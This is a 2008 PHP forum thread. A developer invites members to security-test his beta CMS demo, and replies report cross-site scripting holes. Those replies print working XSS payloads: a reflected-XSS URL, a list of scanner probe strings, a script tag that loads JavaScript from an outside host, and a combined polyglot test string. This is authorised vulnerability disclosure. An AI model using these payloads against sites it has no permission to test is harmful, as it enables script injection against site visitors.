Grayda Posted September 16, 2008 Share Posted September 16, 2008 It's been out to the public for a while (as a beta), but I'm still doing security tests with it. Before I move my main website to this engine, can someone give it a thorough testing? It's a dead-easy to use CMS. You install it, log in and your page reloads with some "Edit <page>" links next to each section of content. Click that link, type your new content in to the WYSIWYG editor and click Save. The page reloads and your website is updated. Also uses phpGACL for security. This is my first major PHP Project released (despite using PHP for 3-4 years now) and I want to make sure it's good. You can try out the live version at: http://demo.spage.solidinc.org and download the latest build (beta 2) from http://spage.solidinc.org/index.php?page=downloads&latest=1. Beta 2 comes with an installer so it should be rather easy to install. I'd like you to fiddle with everything, see if unauthenticated users can get anywhere they're not supposed to, log in as moderators and try and escalate privileges, stuff like that. Obviously no stuff that will break the demo site (the demo site resets on the hour anyway). And if you have time, some comments on what you think of it's ease of use and stuff, but PM or email me with those because it's off-topic Link to comment https://forums.phpfreaks.com/topic/124564-spage-cms-security-tests/ Share on other sites More sharing options...
Coreye Posted September 17, 2008 Share Posted September 17, 2008 Cross Site Scripting(XSS): http://demo.spage.solidinc.org/?page="><marquee><h1>Corey Cross Site Scripting(XSS): You can submit ">code when adding page descriptions. Link to comment https://forums.phpfreaks.com/topic/124564-spage-cms-security-tests/#findComment-643564 Share on other sites More sharing options...
darkfreaks Posted October 13, 2008 Share Posted October 13, 2008 XSS Injection: DOM was modified by attack string. Field appears to be very vulnerable to XSS String. Tested value: <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> DOM was modified by attack string. Field appears to be very vulnerable to XSS String. Tested value: <<script>document.vulnerable=true;</script> DOM was modified by attack string. Field appears to be very vulnerable to XSS String. Tested value: <style><!--</style><script>document.vulnerable=true;//--></script> DOM was modified by attack string. Field appears to be very vulnerable to XSS String. Tested value: &<script>document.vulnerable=true;</script> DOM was modified by attack string. Field appears to be very vulnerable to XSS String. Tested value: <BODY ONLOAD=document.vulnerable=true;> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <![CDATA[<!--]]<script>document.vulnerable=true;//--></script> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <<script>document.vulnerable=true;</script> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <style><!--</style><script>document.vulnerable=true;//--></script> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: ¼script¾document.vulnerable=true;¼/script¾ The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string. Tested value: <BODY ONLOAD=document.vulnerable=true;> Link to comment https://forums.phpfreaks.com/topic/124564-spage-cms-security-tests/#findComment-663640 Share on other sites More sharing options...
GKWelding Posted October 23, 2008 Share Posted October 23, 2008 Your search box is vulnerable to XSS for sure. Just cope and paste the following into it and see for yourself. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> and typing in ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> shows the same thing. The second example above is several attacks combined into one and is a good way of testing if you're in a rush... Link to comment https://forums.phpfreaks.com/topic/124564-spage-cms-security-tests/#findComment-673145 Share on other sites More sharing options...
Recommended Posts